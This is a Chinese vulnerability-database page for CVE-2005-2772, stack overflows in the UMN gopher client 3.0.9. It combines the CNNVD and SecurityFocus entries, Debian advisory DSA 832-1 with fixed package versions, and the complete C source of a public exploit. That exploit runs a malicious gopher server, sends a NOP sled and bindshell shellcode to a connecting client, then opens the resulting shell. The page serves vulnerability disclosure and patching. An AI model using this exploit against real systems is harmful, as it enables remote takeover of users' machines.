CVE-2005-2772
CVSS7.5
发布时间 :2005-09-02 19:03:00
修订时间 :2016-10-17 23:30:07
NMCOEPS    

[原文]Multiple stack-based buffer overflows in University of Minnesota gopher client 3.0.9 allow remote malicious servers to execute arbitrary code via (1) a long "+VIEWS:" reply, which is not properly handled in the VIfromLine function, and (2) certain arguments when launching third party programs such as a web browser from a web link, which is not properly handled in the FIOgetargv function.


[CNNVD]UMN Gopher 多个缓冲区溢出漏洞(CNNVD-200509-004)

        Gopher是美国Minnesota大学所开发的一种协议。Gopher服务器提供有序的目录和文件浏览。在WWW服务日渐为人们熟悉的今天,Ghopher服务已经慢慢被放弃。
        gopher客户端3.0.9版本存在多个堆栈缓存益处。该漏洞允许远程恶意服务器通过(1)长的"+VIEWS:"回复(没有在VlfromLine功能中得到正确处理)执行任意代码;(2)从web链接中启动第三方程序如web浏览器时的特定参数(没有在FLOgetargv功能中得到正确处理)。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2772
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2772
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-004
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112559902931614&w=2
(UNKNOWN)  BUGTRAQ  20050901 UMN gopher[v3.0.9+] multiple(2) client buffer overflows.
http://www.debian.org/security/2005/dsa-832
(UNKNOWN)  DEBIAN  DSA-832
http://www.kb.cert.org/vuls/id/619812
(VENDOR_ADVISORY)  CERT-VN  VU#619812
http://www.securityfocus.com/bid/14693
(UNKNOWN)  BID  14693
http://xforce.iss.net/xforce/xfdb/22053
(UNKNOWN)  XF  umn-gopher-vifromline-bo(22053)

- 漏洞信息

UMN Gopher 多个缓冲区溢出漏洞
高危 缓冲区溢出
2005-09-02 00:00:00 2005-10-20 00:00:00
远程  
        Gopher是美国Minnesota大学所开发的一种协议。Gopher服务器提供有序的目录和文件浏览。在WWW服务日渐为人们熟悉的今天,Ghopher服务已经慢慢被放弃。
        gopher客户端3.0.9版本存在多个堆栈缓存益处。该漏洞允许远程恶意服务器通过(1)长的"+VIEWS:"回复(没有在VlfromLine功能中得到正确处理)执行任意代码;(2)从web链接中启动第三方程序如web浏览器时的特定参数(没有在FLOgetargv功能中得到正确处理)。

- 公告与补丁

        暂无数据

- 漏洞信息 (1187)

Gopher <= 3.0.9 (+VIEWS) Remote (Client Side) Buffer Overflow Exploit (EDBID:1187)
linux local
2005-08-30 Verified
0 vade79
N/A [点击下载]
/*[ gopher[v3.0.9+]: remote (client) buffer overflow exploit. ]
* 
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
* 
* compile: 
* gcc xgopher-client.c -o xgopher-client 
* 
* syntax: 
* ./xgopher-client <port> [bindshell port] 
* 
* The Internet Gopher Client is based on the UMN 
* Gopher/Gopherd 2.3.1 code. Gopher is an Internet technology 
* that predates the Web. It presents information as a virtual 
* network-wide filesystem. Modern browsers such as Konqueror 
* can display gopherspace as if it contained files on your 
* local machine (trees, drag and drop, etc.), but the 
* difference is that each file or folder in that tree may be 
* on a different machine. 
* 
* this client contains a remotely exploitable buffer overflow 
* in the processing of "+VIEWS:" information, located in 
* SRC/object/VIews.c in the VIfromLine() function. 
* 
* this is a stack overflow that can be exploited immediately 
* upon the client's connection to an untrusted gopher server. 
* while this is a stack overflow, exploitation of this 
* overflow is not completely standard, and special values 
* will be needed for it to work. (see the first three DEFINEs 
* below) 
* 
* i made this simply to be sure it was possible to exploit, 
* tested successfully on mandrake/9.2 with gopher/3.0.9 
* compiled from source. 
***************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* THE FOLLOWING THREE DEFINES WILL BE UNIQUE TO EACH SYSTEM. */

/* this needs to be replaced as a null-byte will overwrite it. this */
/* can be found in gdb using a trial-run of the exploit. */
/* (gdb) break VIfromLine */
/* Breakpoint 1 at 0x805c2e5: file VIews.c, line 231. */
/* (gdb) run server-running-this-exploit.com 70 */
/* ... */
/* Breakpoint 1, VIfromLine (vi=0x8074f08, ... */
/* -----------------------------^^^^^^^^^ */
/* ... */
#define REPLACE_VI_ADDR 0x08074f08

/* where the shellcode is located. you can use a trial-run to get */
/* this as well, run "objdump -s <core> | grep 90909090" on the */
/* core file, and choose something in the middle of all the */
/* 0xbfff???? addresses dumped. */
#define RET_ADDR 0xbfffe910

/* guess time; try between 0-12, not likely to be anything */
/* higher than that. */
#define PLACEMENT_OFFSET 7

/* FROM HERE ON THE DEFINES DO NOT NEED TO BE MODIFIED. */
#define BUFSIZE 500
#define DFL_BINDSHELL_PORT 7979
#define TIMEOUT 10

static char x86_exec[]= /* bindshell, from netric. */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
"\xcd\x80\x31\xd2\x52\x66\x68\xff\xff\x43\x66\x53\x89"
"\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
"\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
"\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
"\x80";

/* prototypes. */
unsigned char *getcode(void);
char *gopherd_bind(unsigned short);
void getshell(char *,unsigned short);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv){
unsigned short port=0,sport=DFL_BINDSHELL_PORT;
char *hostptr;
printf("[*] gopher[v3.0.9+]: remote (client) buffer overflow exp"
"loit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[!] syntax: %s <port> [bindshell port]\n",argv[0]);
exit(1);
}
port=atoi(argv[1]);
if(argc>2)sport=atoi(argv[2]);

/* set the port to bind to in the shellcode. */
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);

/* verbose values display. */
printf("[*] replacement \"vi\" address\t\t: 0x%.8x\n",REPLACE_VI_ADDR);
printf("[*] return address\t\t\t: 0x%.8x\n",RET_ADDR);
printf("[*] offset from the end of tmpstr[]\t: %d (=%d)\n",
PLACEMENT_OFFSET,PLACEMENT_OFFSET*4);
printf("[*] server port\t\t\t\t: %u\n",port);
printf("[*] bindshell port\t\t\t: %u\n\n",sport);

/* wait for a connection and send overflow. */
hostptr=gopherd_bind(port);

/* be safe, and give it time to run. */
sleep(3);

/* see if a shell spawned. */
getshell(hostptr,sport);

exit(0);
}
/* this is what fills the buffer that will be overflown. (tmpstr[256]) */
unsigned char *getcode(void){
unsigned char *buf;
if(!(buf=(unsigned char *)malloc(BUFSIZE+1)))
printe("getcode(): allocating memory failed.",1);

/* make everything nops, and overwrite where needed. */
memset(buf,0x90,BUFSIZE);

/* this gives more NOP/guessing room. if it hits before the addresses, */
/* it will jump over them to get to the shellcode. (jumps 8 bytes) */
buf[254+(PLACEMENT_OFFSET*4)]=0xeb; /* jump, */
buf[255+(PLACEMENT_OFFSET*4)]=0x08; /* 8. */

/* return address. */
*(long *)&buf[256+(PLACEMENT_OFFSET*4)]=RET_ADDR;

/* the replacement value will be right after the new return address. */
/* (this is needed because a null-byte will corrupt it, and fault */
/* where not desired) */
*(long *)&buf[260+(PLACEMENT_OFFSET*4)]=REPLACE_VI_ADDR;

/* add shellcode to the end of the buffer. */
memcpy(buf+BUFSIZE-strlen(x86_exec),x86_exec,strlen(x86_exec));
return(buf);
}
char *gopherd_bind(unsigned short port){
int ssock=0,sock=0,so=1;
unsigned int salen=0;
char pseudobuf[2];
struct sockaddr_in ssa,sa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
printf("[*] awaiting connection from: *:%d.\n",port);
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
listen(ssock,1); 
bzero((char*)&sa,sizeof(struct sockaddr_in));
salen=sizeof(sa);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
close(ssock);
printf("[*] gopher server connection established.\n");

/* not really needed, but i feel better with it waiting for it. */
printf("[*] waiting for <any> request/data...\n");
read(sock,pseudobuf,1);
printf("[*] received request/data, sending overflow.\n");

/* setup the precursor to cause the overflow. */
write(sock,"+-1\n",4);
write(sock,"+INFO:\t0filler\tfiller\tfiller\tfiller\n",36);
write(sock,"+VIEWS:\t\n ",10);

/* the overflow. */
write(sock,getcode(),BUFSIZE);
write(sock,"\n",1);

sleep(1);
close(sock);
printf("[*] gopher server connection closed.\n");
return(inet_ntoa(sa.sin_addr));
}
void getshell(char *hostname,unsigned short port){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
printf("[*] checking to see if the exploit was successful.\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
return;
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)
exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)
exit(1);
return;
}

// milw0rm.com [2005-08-30]
		

- 漏洞信息 (F40367)

Debian Linux Security Advisory 832-1 (PacketStormID:F40367)
2005-10-04 00:00:00
Debian  security.debian.org
advisory,overflow,protocol
linux,debian
CVE-2005-2772
[点击下载]

Debian Security Advisory DSA 832-1 - Several buffer overflows have been discovered in gopher, a text-oriented client for the Gopher Distributed Hypertext protocol, that can be exploited by a malicious Gopher server.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 832-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
September 30th, 2005                    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : gopher
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2772

Several buffer overflows have been discovered in gopher, a
text-oriented client for the Gopher Distributed Hypertext protocol,
that can be exploited by a malicious Gopher server.

For the old stable distribution (woody) this problem has been fixed in
version 3.0.3woody4.

For the stable distribution (sarge) this problem has been fixed in
version 3.0.7sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 3.0.11.

We recommend that you upgrade your gopher package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4.dsc
      Size/MD5 checksum:      552 a327347b4ca41edceaa5280b28f2e5d5
    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4.tar.gz
      Size/MD5 checksum:   508988 58d4e3328a390b9fc0ddefe1c0df5a51

  Alpha architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_alpha.deb
      Size/MD5 checksum:   151748 8bc114553f10115b8271fe8acd94a73e
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_alpha.deb
      Size/MD5 checksum:   120354 30f0ed9c97860dd698d466d3ec0621b9

  ARM architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_arm.deb
      Size/MD5 checksum:   114918 7c860f6683fefc81abee935e665fc821
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_arm.deb
      Size/MD5 checksum:    98868 7ddacad657d80e5f74bd3512bc0ea945

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_i386.deb
      Size/MD5 checksum:   112864 a98db59b12ef106f9de47ac96f2ca1f6
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_i386.deb
      Size/MD5 checksum:    97094 160f635e3990d500ffb6ea26bb62b889

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_ia64.deb
      Size/MD5 checksum:   174114 a55f00a1d07a8025c7da9cd70f3bc892
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_ia64.deb
      Size/MD5 checksum:   140066 a99583e9ce799cf3e7b01438daf8234d

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_hppa.deb
      Size/MD5 checksum:   130034 699066d45c5edce4de93f95039d35572
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_hppa.deb
      Size/MD5 checksum:   110032 aa7b0836c8d3a279c53cefde4f9ce162

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_m68k.deb
      Size/MD5 checksum:   105908 3f4d5ecc8a9c6005d419addc71f0ef61
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_m68k.deb
      Size/MD5 checksum:    92112 e9f1a4c8fee88016110bbaf4b94c12bd

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_mips.deb
      Size/MD5 checksum:   131298 29a89787e234423f09f596b67ea9dbb2
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_mips.deb
      Size/MD5 checksum:   109718 7d9f79f13798f28c352b470d5b8c0912

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_mipsel.deb
      Size/MD5 checksum:   131304 dd67d244de0ce8f43f8eacdeb5aef097
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_mipsel.deb
      Size/MD5 checksum:   109616 451b851cc0a94170990e17150ae0142f

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_powerpc.deb
      Size/MD5 checksum:   121634 39a8ff2a22cc138346aee8edbd657e69
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_powerpc.deb
      Size/MD5 checksum:   103060 275a8b1727be3f21c7930fb24c49355c

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_s390.deb
      Size/MD5 checksum:   116502 e83501dd0115539baaa3a42cb07f415c
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_s390.deb
      Size/MD5 checksum:   100068 22c6a15508dd9148bd420589ad2f0c83

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.3woody4_sparc.deb
      Size/MD5 checksum:   122218 dcec2ecb35159ba55868e00b62c8c102
    http://security.debian.org/pool/updates/main/g/gopher/gopherd_3.0.3woody4_sparc.deb
      Size/MD5 checksum:   102384 c102bce1608789be90158e2c21bb083a


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2.dsc
      Size/MD5 checksum:      547 8631a74bbd27efb7e4ec181a4545819c
    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2.tar.gz
      Size/MD5 checksum:   678450 911e24e57995db87b62f77f66c4e1868

  Alpha architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_alpha.deb
      Size/MD5 checksum:   148300 175f7e5d94e558341c8619b0fd06b201

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_amd64.deb
      Size/MD5 checksum:   130166 1575ab220fcfdde834747e9a1341aad1

  ARM architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_arm.deb
      Size/MD5 checksum:   117018 a966a08fcaf27fa6737bff5461e19642

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_i386.deb
      Size/MD5 checksum:   120830 5f683d05ce84e7b085a3212129e553f8

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_ia64.deb
      Size/MD5 checksum:   168826 28996bc8c3665b8e1c1620ee2151cbfc

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_hppa.deb
      Size/MD5 checksum:   132938 c7f4b90e121fa77217edd3cdd17fbcbf

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_m68k.deb
      Size/MD5 checksum:   110142 b89a874f397762865c63b2ecf48bf24d

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_mips.deb
      Size/MD5 checksum:   133884 57d303bd2778e250d74cbbbdbe6028da

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_mipsel.deb
      Size/MD5 checksum:   133920 a9d6c23622d87d7d17ffb251497b543e

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_powerpc.deb
      Size/MD5 checksum:   129352 c7bffc3f4ee37401054f5269853f3eb9

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_s390.deb
      Size/MD5 checksum:   129334 313edbdd4b226c5a1a0b4260e4fb9943

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/g/gopher/gopher_3.0.7sarge2_sparc.deb
      Size/MD5 checksum:   117334 e094349743c818e37bae459501723790


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDPTpSW5ql+IAeqTIRAjunAKCR2tdDWDD3j4T8jdqH6bUzJOt9fgCgrfva
d3hSTNbAkO7bXImQVbw1OWE=
=O5tk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

19082
UMN Gopher +VIEWS: Reply VIfromLine() Function Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-08-30 Unknow
2005-08-30 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

UMN Gopher Client Remote Buffer Overflow Vulnerability
Boundary Condition Error 14693
Yes No
2005-08-30 12:00:00 2009-07-12 05:06:00
Discovery is credited to vade79.

- 受影响的程序版本

University of Minnesota gopherd 3.0.9
University of Minnesota gopherd 3.0.7
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
University of Minnesota gopherd 3.0.5
University of Minnesota gopherd 3.0.4
University of Minnesota gopherd 3.0.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0

- 漏洞讨论

Gopher is prone to a remote buffer overflow vulnerability.

The vulnerability presents itself when the client handles a malformed '+VIEWS:' reply from a server.

A remote attacker may gain unauthorized access in the context of the user running the application.

Gopher version 3.0.9 is reported to be affected by this vulnerability, however, other versions may be vulnerable as well.

- 漏洞利用

Exploit code is available:

- 解决方案

Debian has released advisory DSA 832-1 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


University of Minnesota gopherd 3.0.3

University of Minnesota gopherd 3.0.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站